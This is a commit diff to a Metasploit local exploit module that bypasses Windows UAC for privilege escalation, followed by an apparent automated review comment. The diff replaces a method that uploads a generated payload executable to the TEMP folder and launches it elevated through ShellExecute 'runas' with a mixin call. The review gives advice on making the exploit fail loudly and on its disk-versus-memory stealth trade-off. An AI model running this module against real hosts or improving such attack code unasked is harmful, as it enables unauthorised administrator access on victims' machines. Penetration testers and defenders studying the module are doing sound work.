Fall back to runas if UAC disabled
parent
8f720ef766
commit
a9fee9c022
|
@ -14,6 +14,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
include Post::File
|
||||
include Post::Windows::Priv
|
||||
include Post::Windows::ReflectiveDLLInjection
|
||||
include Post::Windows::Runas
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
|
@ -33,7 +34,9 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
|
||||
'mitnick',
|
||||
'mubix', # Port to local exploit
|
||||
'Ben Campbell' # In memory technique
|
||||
'Ben Campbell', # In memory technique
|
||||
'Lesage', # Win8+ updates
|
||||
'OJ Reeves' # Win 8+ updates
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
|
@ -76,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_good('BypassUAC can bypass this setting, continuing...')
|
||||
when UAC_NO_PROMPT
|
||||
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
|
||||
runas_method(env_vars['TEMP'])
|
||||
shell_execute_exe
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -142,20 +145,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
end
|
||||
|
||||
def runas_method(temp_dir)
|
||||
payload = generate_payload_exe
|
||||
payload_filename = Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
|
||||
temp_exe = "#{temp_dir}\\#{payload_filename}"
|
||||
|
||||
print_status("Uploading payload: #{temp_exe}")
|
||||
write_file(temp_exe, payload)
|
||||
register_file_for_cleanup(temp_exe)
|
||||
|
||||
print_status("Executing payload: #{temp_exe}")
|
||||
session.railgun.shell32.ShellExecuteA(nil, 'runas', temp_exe, nil, nil, 5)
|
||||
print_status('Payload executed.')
|
||||
end
|
||||
|
||||
def run_injection(pid, dll_path, file_paths)
|
||||
vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
|
||||
begin
|
||||
|
@ -226,9 +215,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
if is_uac_enabled?
|
||||
print_status('UAC is Enabled, checking level...')
|
||||
else
|
||||
if is_in_admin_group?
|
||||
fail_with(Exploit::Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
|
||||
else
|
||||
unless is_in_admin_group?
|
||||
fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
|
||||
end
|
||||
end
|
||||
|
|
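Review bot: The new `UAC_NO_PROMPT` branch calls `shell_execute_exe` and then `return`s unconditionally, so if the helper reports failure (ShellExecute returning a value of 32 or less, or the elevated process never starting) the module ends quietly instead of through `fail_with`; the removed `runas_method` had the same blind spot, and this is the place to close it, e.g. `fail_with(Exploit::Failure::Unknown, 'runas fallback failed to launch payload') unless shell_execute_exe` — assuming the `Post::Windows::Runas` mixin returns a truthy value on success, which is not visible in this diff. A caveat next to the `print_warning` would also help the operator: the deleted `runas_method` wrote a payload exe to `%TEMP%` and registered it for cleanup, and if the mixin does the same then this fallback touches disk while the bypass path is in-memory, so `# NOTE: the runas fallback drops the payload exe to disk (noisier than the in-memory bypass)` states the trade-off explicitly. The `case` these `when` lines belong to starts and ends outside the hunk.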